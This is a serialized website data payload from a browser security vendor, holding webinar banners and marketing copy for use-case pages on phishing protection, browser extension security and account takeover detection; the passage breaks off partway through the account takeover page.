[{"data":1,"prerenderedAt":15208},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":95,"use-case-page":154,"events-pages-/events/sector-2026":1174,"latestResourcesBlogPosts":1239,"/events/sector-2026-form":14250},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8,59,76],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"query":14,"data":15,"variations":49,"lastUpdated":50,"firstPublished":51,"testRatio":42,"createdBy":52,"lastUpdatedBy":53,"folders":54,"meta":55,"rev":58},1742213002749,"efff2a27faf4408e9f908eba4b5542fe","Testimonial - Inductive - Resource - State of Browser Attacks Series","1c6207a5f24948ab82d4a0b17f251193","published",[],{"description":16,"testimonialLink":17,"title":18,"testimonial":19,"type":22,"image":45,"link":46},"Join the industry's top security minds as they break down the browser attack landscape.","/customer-stories/inductive-automation","State of Browser Attacks Series",{"@type":20,"id":21,"model":22,"value":23},"@builder.io/core:Reference","f028f2b685bb47cd8bf9e82a26dd5a79","testimonial",{"query":24,"folders":25,"createdDate":26,"id":21,"name":27,"modelId":28,"published":13,"meta":29,"data":35,"variations":39,"lastUpdated":40,"firstPublished":41,"testRatio":42,"createdBy":43,"lastUpdatedBy":43,"rev":44},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"kind":30,"lastPreviewUrl":31,"breakpoints":32},"data","",{"small":33,"medium":34},640,768,{"author":36,"jobTitle":37,"quote":27,"image":38},"Jason Waits","\u003Cp>CISO at Inductive 
Automation\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,1,"ST0tXQM8slWpFrmioqKHmENB2qe2","jxysw5jmdok","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe94fca10aa7b46ac8052b7ea22de54cd",{"url":47,"text":48},"https://pushsecurity.com/webinar/state-of-browser-security","Save Your Spot",{},1775235712324,1742221533648,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2","ax7YYfD0OCeqT1Vxxv1G4FUbqVr1",[],{"kind":30,"breakpoints":56,"lastPreviewUrl":31,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},320,"h0jxrpelqyl",{"createdDate":60,"id":61,"name":62,"modelId":12,"published":13,"query":63,"data":64,"variations":69,"lastUpdated":70,"firstPublished":71,"testRatio":42,"createdBy":52,"lastUpdatedBy":72,"folders":73,"meta":74,"rev":58},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner",[],{"type":65,"url":66,"text":67,"link":68},"web-banner","https://pushsecurity.com/resources/browser-attacks-report","Get our latest report analyzing browser attack techniques in 2026",{},{},1774258294825,1742208637545,"jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],{"kind":30,"lastPreviewUrl":31,"breakpoints":75,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},{"createdDate":77,"id":78,"name":79,"modelId":12,"published":13,"query":80,"data":81,"variations":89,"lastUpdated":90,"firstPublished":91,"testRatio":42,"createdBy":52,"lastUpdatedBy":72,"folders":92,"meta":93,"rev":58},1742208469288,"6763051b201f44a0838c6400c580ca67","Resource highlight",[],{"type":82,"title":83,"link":84,"description":87,"image":88},"resource","Report: 2026 Browser Attack Techniques",{"text":85,"url":86},"Download now","/resources/browser-attacks-report","Learn about the latest techniques being used in the 
wild.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9",{},1772632591818,1742208570400,[],{"lastPreviewUrl":31,"kind":30,"breakpoints":94,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},{"createdDate":96,"id":97,"name":98,"modelId":99,"published":13,"query":100,"data":101,"variations":145,"lastUpdated":146,"firstPublished":147,"testRatio":42,"createdBy":43,"lastUpdatedBy":53,"folders":148,"meta":149,"rev":153},1774965361051,"fd266d0172cc47429be7ad10f48c99ad","always visible banner","0678d178ec8b41efb8a23c09dba7874d",[],{"ctaText":102,"text":103,"url":31,"blocks":104,"state":141},"ewrererw","testrfesssssssssss",[105,129],{"@type":106,"@version":107,"id":108,"component":109,"responsiveStyles":119},"@builder.io/sdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":110,"tag":110,"options":111,"isRSC":118},"TopBannerContent",{"text":112,"ctaText":48,"url":47,"mainText":113,"cta":116},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks",{"content":114,"fontSize":115},"\u003Cp>New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks\u003C/p>","text-base",{"content":117,"fontSize":115,"url":47},"\u003Cp>\u003Cstrong style=\"font-weight:700;\">Save Your 
Spot\u003C/strong>\u003C/p>\n",null,{"large":120},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"marginTop":126,"marginBottom":126,"fontSize":127,"fontWeight":128},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"id":130,"@type":106,"tagName":131,"properties":132,"responsiveStyles":136},"builder-pixel-iatci5fl4tg","img",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},"https://cdn.builder.io/api/v1/pixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true","presentation",{"large":137},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},"block","hidden","none",{"deviceSize":142,"location":143},"large",{"path":31,"query":144},{},{},1775137295127,1774968080803,[],{"breakpoints":150,"hasLinks":6,"kind":151,"lastPreviewUrl":152,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},"component","https://pushsecurity.com/?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default","qusj1ngf9ys",[155,340,459,577,695,815,935,1055],{"createdDate":156,"id":157,"name":158,"modelId":159,"published":13,"query":160,"data":166,"variations":328,"lastUpdated":329,"firstPublished":330,"testRatio":42,"screenshot":331,"createdBy":43,"lastUpdatedBy":332,"folders":333,"meta":334,"rev":3
39},1744829487099,"387451215c314dd5bd654668cdc1a197","Zero-day phishing","cca4143377554c5a9163cc203a8ed2ba",[161],{"@type":162,"property":163,"operator":164,"value":165},"@builder.io/core:Query","urlPath","is","/uc/zero-day-phishing-protection",{"seoDescription":167,"inputs":168,"jsCode":31,"title":169,"seoTitle":169,"customFonts":170,"fontAwesomeIcon":218,"tsCode":31,"blocks":219,"url":165,"state":325},"Detect phishing TTPs directly in the browser and stop credential theft.",[],"Zero-day phishing protection",[171],{"version":172,"lastModified":173,"kind":174,"subsets":175,"family":178,"variants":179,"menu":197,"category":198,"files":199},"v14","2023-07-13","webfonts#webfont",[176,177],"latin","latin-ext","DM Sans",[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],"100","200","300","regular","500","600","800","900","100italic","200italic","300italic","italic","500italic","600italic","700italic","800italic","900italic","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAopxRT23z.ttf","sans-serif",{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"900italic":208,"500italic":209,"regular":210,"100italic":211,"200italic":212,"700italic":213,"300italic":214,"800italic":215,"italic":216,"600italic":217},"https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAop1hTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAIpxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwA_JxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAkJxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAfJthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwARZthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2t
p2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAIpthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAC5thTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8gCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-7DW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAopxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-JDG3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8JDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat9uCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat_XDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8JCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-JDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat9XCm3zRmYJpso5.ttf","faFishingRod",[220,320],{"@type":106,"@version":107,"tagName":221,"id":222,"children":223},"div","builder-76c6b8d1499346c7bc1fd56ae4e93638",[224,241,250,257,269,284,295,306,312],{"@type":106,"@version":107,"layerName":225,"id":226,"component":227,"responsiveStyles":238},"UseCaseHero","builder-5228fe062bef4a40a91e43f1112832fa",{"name":225,"options":228,"isRSC":118},{"title":169,"description":229,"points":230,"video":237},"\u003Cp>Push detects phishing, session hijacking, malicious copy/paste, and malicious integrations as they happen, using browser-native telemetry to stop threats before they escalate. 
From cloned login pages to custom toolkits, Push sees what traditional filters miss, and gives defenders the tools to respond fast.\u003C/p>",[231,233,235],{"item":232},"Detect phishing that bypasses traditional filters, including AiTM, SSO password theft, and fake login pages",{"item":234},"Stop never-before-seen attacks with behavioral and on-page analysis inside the browser",{"item":236},"Investigate faster with unified browser, user, and page context","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F40433ceeb4f94b43a82e039a0f4fd411%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=40433ceeb4f94b43a82e039a0f4fd411&alt=media&optimized=true",{"large":239},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},"transparent",{"@type":106,"@version":107,"id":242,"component":243,"responsiveStyles":247},"builder-96634044407e491299e291ed64669e39",{"name":244,"options":245,"isRSC":118},"TrustedBy",{"AllPartners":246,"backgroundTransparent":6},true,{"large":248},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},"#000",{"@type":106,"@version":107,"id":251,"component":252,"responsiveStyles":255},"builder-2c3768f930534557bb8978e32b6a6a0f",{"name":253,"options":254,"isRSC":118},"Diagonal",{"darkMode":246},{"large":256},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"layerName":258,"id":259,"component":260,"responsiveStyles":267},"TextImageBlockVertical","builder-7c3c1c2840424db2ad2ccbfaf382dd64",{"name":258,"tag":258,"options":261,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":264,"description":265,"animatedTitle":31,"image":266,"reverse":6,"descriptionPaddingHorizontal":118},1200,800,"\u003Ch2>Why stop at the inbox?\u003C/h2>","\u003Cp>Phishing attacks have evolved. 
Whether attackers lure users with QR codes, instant messages, or OAuth consent screens, the outcome is the same: it plays out in the browser. Push gives you real-time detection for in-browser threats, stopping phishing and consent-based attacks before they lead to compromise\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7fdcac241f0e4a049166d7076858adeb",{"large":268},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":270,"component":271,"responsiveStyles":279},"builder-41c978b3669749cf947e622b4e79e4d7",{"name":272,"options":273,"isRSC":118},"TextImageBlockHorizontal",{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":276,"description":277,"reverse":246,"image":278},600,100,"\u003Cp>Detect phishing at the edge\u003C/p>","\u003Cp>Push uses industry-first telemetry to detect phishing based on behavior, not static indicators. By analyzing how phishing pages behave and how users interact with them, Push uncovers fake logins, credential theft, and phishing kits the moment they load in the browser.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F9df3d180c97b4e61af142af2ccd68721",{"large":280},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":282,"marginTop":283},"DM Sans, sans-serif","20px","0px",{"@type":106,"@version":107,"id":285,"component":286,"responsiveStyles":292},"builder-d2a7bc941feb43cdb898bc116b203cf9",{"name":272,"options":287,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":289,"description":290,"reverse":6,"image":291},120,"\u003Ch2>Go beyond blocklists and IOCs\u003C/h2>","\u003Cp>Push goes beyond URLs and easy-to-change indicators. 
It reads the full phishing playbook like script behavior, session hijacks, DOM changes, user inputs, then connects the dots in real time. This gives your team a complete picture of how the phishing attempt worked, not just an alert.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fabfd58db169b433e96d3f1261797156e",{"large":293},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},"36px",{"@type":106,"@version":107,"layerName":272,"id":296,"component":297,"responsiveStyles":303},"builder-42c32198083f4880acb37c5cb76934da",{"name":272,"options":298,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":300,"description":301,"reverse":246,"image":302},140,"\u003Ch2>Enhance your phishing response\u003C/h2>","\u003Cp>When phishing enters your environment, speed matters. Push gives you instant access to the telemetry that counts like session data, user behavior, and page activity, so you can investigate fast, trigger in-browser prompts, or forward alerts to your SIEM or SOAR for response. 
All in real time, right from the browser.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbb195aec46904056b85e8688629e558e",{"large":304},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},"47px",{"@type":106,"@version":107,"id":307,"component":308,"responsiveStyles":310},"builder-9a95b9cbc4854421a92ef7b90f6c7adb",{"name":253,"options":309,"isRSC":118},{"darkMode":6},{"large":311},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":313,"component":314,"responsiveStyles":318},"builder-0afa17a9f25c4661a90f314d5578aa18",{"name":315,"tag":315,"options":316,"isRSC":118},"LatestResources",{"sectionHeading":31,"customClass":317},"bg-black",{"large":319},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":321,"@type":106,"tagName":131,"properties":322,"responsiveStyles":323},"builder-pixel-pu9f1z4fxj",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":324},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":326},{"path":31,"query":327},{},{},1770892739171,1745499158657,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F69dffdb7f2b14fe6b2e160d0e7f8f83a","SfUPqW5tkibIPby49keNFMdHFTr1",[],{"lastPreviewUrl":335,"breakpoints":336,"kind":337,"hasLinks":6,"winningTest":118,"originalContentId":338,"hasAutosaves":6},"https://pushsecurity.com/uc/zero-day-phishing-protection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user
.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=387451215c314dd5bd654668cdc1a197&builder.overrides.387451215c314dd5bd654668cdc1a197=387451215c314dd5bd654668cdc1a197&builder.overrides.use-case-page:/uc/zero-day-phishing-protection=387451215c314dd5bd654668cdc1a197&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":33,"medium":34},"page","2daa5670b8504fc7ba4700633e8bd921","z99icwz89i",{"createdDate":341,"id":342,"name":343,"modelId":159,"published":13,"query":344,"data":347,"variations":451,"lastUpdated":452,"firstPublished":453,"testRatio":42,"screenshot":454,"createdBy":43,"lastUpdatedBy":332,"folders":455,"meta":456,"rev":339},1756833377777,"54f8256648f54d439303734b1e69221b","Browser extension security",[345],{"@type":162,"property":163,"operator":164,"value":346},"/uc/browser-extension-security",{"seoTitle":343,"jsCode":31,"title":343,"seoDescription":348,"customFonts":349,"fontAwesomeIcon":354,"inputs":355,"tsCode":31,"blocks":356,"url":346,"state":448},"Shine a light on risky browser 
extensions.",[350],{"variants":351,"category":198,"kind":174,"lastModified":173,"version":172,"menu":197,"family":178,"files":352,"subsets":353},[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"700italic":213,"800italic":215,"100italic":211,"regular":210,"200italic":212,"500italic":209,"600italic":217,"300italic":214,"900italic":208,"italic":216},[176,177],"faPuzzlePiece",[],[357,443],{"@type":106,"@version":107,"tagName":221,"id":358,"meta":359,"children":360},"builder-71d0648c1d2f4ede8d0d0b5b28b7b94c",{"previousId":222},[361,377,384,391,400,410,420,430,437],{"@type":106,"@version":107,"id":362,"meta":363,"component":364,"responsiveStyles":375},"builder-ff325b4b8fad4edea53f38865947e854",{"previousId":226},{"name":225,"options":365,"isRSC":118},{"title":343,"description":366,"points":367,"video":374},"\u003Cp>Browser extensions introduce new code, new permissions, and new potential for risk. Most go completely unnoticed. 
Push gives you full visibility into every extension used across your workforce, across major browsers, so you can uncover shadow IT, assess risky permissions, and block unsafe tools before they lead to compromise.\u003C/p>",[368,370,372],{"item":369},"Discover every browser extension in use",{"item":371},"Spot risky or unsanctioned behavior",{"item":373},"Make informed decisions on extension policy","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fc538aad95d7f403aa3c3551af72f67c0?alt=media&token=1411fa6d-2eac-4e6c-94bf-ea117da12d67&apiKey=f3a1111ff5be48cdbb123cd9f5795a05",{"large":376},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":378,"meta":379,"component":380,"responsiveStyles":382},"builder-fb89d128c64e47cf9cbb11d90fc24523",{"previousId":242},{"name":244,"options":381,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":383},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":385,"meta":386,"component":387,"responsiveStyles":389},"builder-54388d35126c4d0096eeebaf8c4448cd",{"previousId":251},{"name":253,"options":388,"isRSC":118},{"darkMode":246},{"large":390},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"layerName":258,"id":392,"component":393,"responsiveStyles":398},"builder-3c8fa6785dd6466abf52a2470d66d85a",{"name":258,"tag":258,"options":394,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":395,"description":396,"image":397,"reverse":6},"\u003Ch2>Take control of browser extensions\u003C/h2>","\u003Cp>Attackers are increasingly using malicious browser extensions to gain access to data processed and stored in the browser. And the problem is, most security teams have no visibility into what extensions are being used. Push changes that. 
With browser-native telemetry, the Push extension continuously inventories browser extensions across your environment, flags the risky ones, and gives you intelligence to act.&nbsp;\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0a004f16a6874f4c8fdf14344acc9fec",{"large":399},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":401,"meta":402,"component":403,"responsiveStyles":408},"builder-93738f98109a4009affb349afd7bb182",{"previousId":270},{"name":272,"options":404,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":405,"description":406,"reverse":246,"image":407},"\u003Ch2>Discover every extension in use\u003C/h2>","\u003Cp>Push gives you structured, searchable data about every extension in your environment, so you’re not just seeing what’s there, but also understanding how it got there, what it can do, and who it affects. It’s the kind of granular insight that’s nearly impossible to get from traditional tools, and it lays the groundwork for better policy decisions and faster investigations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0e5727ca99474f14b1b7916bf6bbb782",{"large":409},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":282,"marginTop":283},{"@type":106,"@version":107,"id":411,"meta":412,"component":413,"responsiveStyles":418},"builder-83393acb12ee4fdd840839185b51edb4",{"previousId":285},{"name":272,"options":414,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":415,"description":416,"reverse":6,"image":417},"\u003Ch2>Spot risky or malicious extensions\u003C/h2>","\u003Cp>Push highlights extensions with dangerous permissions, broad access, or poor reputations. 
You can quickly detect sideloaded, manually installed, or development-mode extensions that bypass normal controls. And because Push shows you who’s using them and where, you can respond precisely and effectively.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa104d58c8da34fbb8901f738fb21453b",{"large":419},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":421,"meta":422,"component":423,"responsiveStyles":428},"builder-da98e3de949646d89c53a0d1c2784664",{"previousId":296},{"name":272,"options":424,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":425,"description":426,"reverse":246,"image":427},"\u003Ch2>Accelerate security reviews\u003C/h2>","\u003Cp>Most teams have extension policies, they just don’t have the data to enforce them. Push reveals how each extension entered your environment, whether it was installed manually, sideloaded, or deployed in dev mode. 
You’ll see which users are running what, and where, so you can surface violations, investigate quickly, and respond with confidence.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F229f355be6f243b180f410d237a75bb3",{"large":429},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":431,"meta":432,"component":433,"responsiveStyles":435},"builder-1a689287d1a1418997d57db578a71105",{"previousId":307},{"name":253,"options":434,"isRSC":118},{"darkMode":6},{"large":436},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":438,"component":439,"responsiveStyles":441},"builder-feb4e75029f84c10b6498ef1f8f79128",{"name":315,"tag":315,"options":440,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":442},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":444,"@type":106,"tagName":131,"properties":445,"responsiveStyles":446},"builder-pixel-qhp5spm8dfn",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":447},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":449},{"path":31,"query":450},{},{},1770892784593,1757000441666,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe2a7508a3c154fc78c88707cfb9b034a",[],{"hasLinks":6,"breakpoints":457,"originalContentId":157,"kind":337,"lastPreviewUrl":458,"winningTest":118,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},"https://pushsecurity.com/uc/browser-extension-security?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProj
ects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=54f8256648f54d439303734b1e69221b&builder.overrides.54f8256648f54d439303734b1e69221b=54f8256648f54d439303734b1e69221b&builder.overrides.use-case-page:/uc/browser-extension-security=54f8256648f54d439303734b1e69221b&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"createdDate":460,"id":461,"name":462,"modelId":159,"published":13,"query":463,"data":466,"variations":569,"lastUpdated":570,"firstPublished":571,"testRatio":42,"screenshot":572,"createdBy":43,"lastUpdatedBy":332,"folders":573,"meta":574,"rev":339},1744923509705,"94bebb7bb99d48629ad157e80cf4d81d","Account takeover detection",[464],{"@type":162,"property":163,"operator":164,"value":465},"/uc/account-takeover-detection",{"title":462,"customFonts":467,"jsCode":31,"seoTitle":462,"seoDescription":472,"fontAwesomeIcon":473,"tsCode":31,"blocks":474,"url":465,"state":566},[468],{"kind":174,"category":198,"variants":469,"menu":197,"files":470,"family":178,"subsets":471,"version":172,"lastModified":173},[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"300italic":214,"500italic":209,"800italic":215,"700italic":213,"italic":216,"900italic":208,"600italic":217,"200italic":212,"regular":210,"100italic":211},[176,177],"Stop ATO with stolen credential and compromised token 
detection.","faUserSecret",[475,561],{"@type":106,"@version":107,"tagName":221,"id":476,"meta":477,"children":478},"builder-e7913a774cae44c5a23d6081c5c30a52",{"previousId":222},[479,495,502,509,518,528,538,548,555],{"@type":106,"@version":107,"id":480,"meta":481,"component":482,"responsiveStyles":493},"builder-f1f1ab1601bc4c0f8c2a8aafd173675d",{"previousId":226},{"name":225,"options":483,"isRSC":118},{"title":462,"description":484,"points":485,"video":492},"\u003Cp>Attackers don’t need to phish, they just need a password that works. Push monitors for signs of credential-based attacks in real time, directly in the browser, catching account takeover attempts before the damage spreads. From ghost logins to credential stuffing, Push cuts off the paths attackers use to quietly slip in the back door.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[486,488,490],{"item":487},"Identify credential-based ATO as it unfolds",{"item":489},"Surface hijacked sessions and token misuse",{"item":491},"Strengthen authentication where your IdP 
